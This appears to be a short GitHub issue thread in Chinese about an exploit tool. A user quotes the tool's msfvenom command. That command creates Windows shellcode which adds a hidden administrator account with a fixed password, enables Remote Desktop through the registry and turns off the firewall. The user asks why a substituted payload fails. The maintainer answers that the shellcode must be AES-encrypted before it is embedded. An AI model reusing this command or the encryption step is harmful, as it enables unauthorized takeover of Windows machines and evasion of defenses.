我改写了这句case "add":，请问这个exp生成完后报错是为什么啊？

Open Joe28abc opened this issue 2 years ago • 1 comments

这个是您的： //msfvenom -p windows/x64/exec EXITFUNC=thread CMD='cmd.exe /c net user sysadmin "1qaz@WSX!@#4" /ADD && net localgroup Administrators sysadmin /ADD && REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f && netsh advfirewall set allprofiles state off' -f hex

我替换成这个：msfvenom -p windows/x64/exec EXITFUNC=thread CMD='cmd.exe /c calc.exe' -f hex 得到hex后，直接替换你的 sc_enc := "xxxxxxxxx" 发现报错了，感觉生成的格式也不同

May 25 '23 14:05 Joe28abc

先AesEncrypt 一下

May 29 '23 03:05 shadow1ng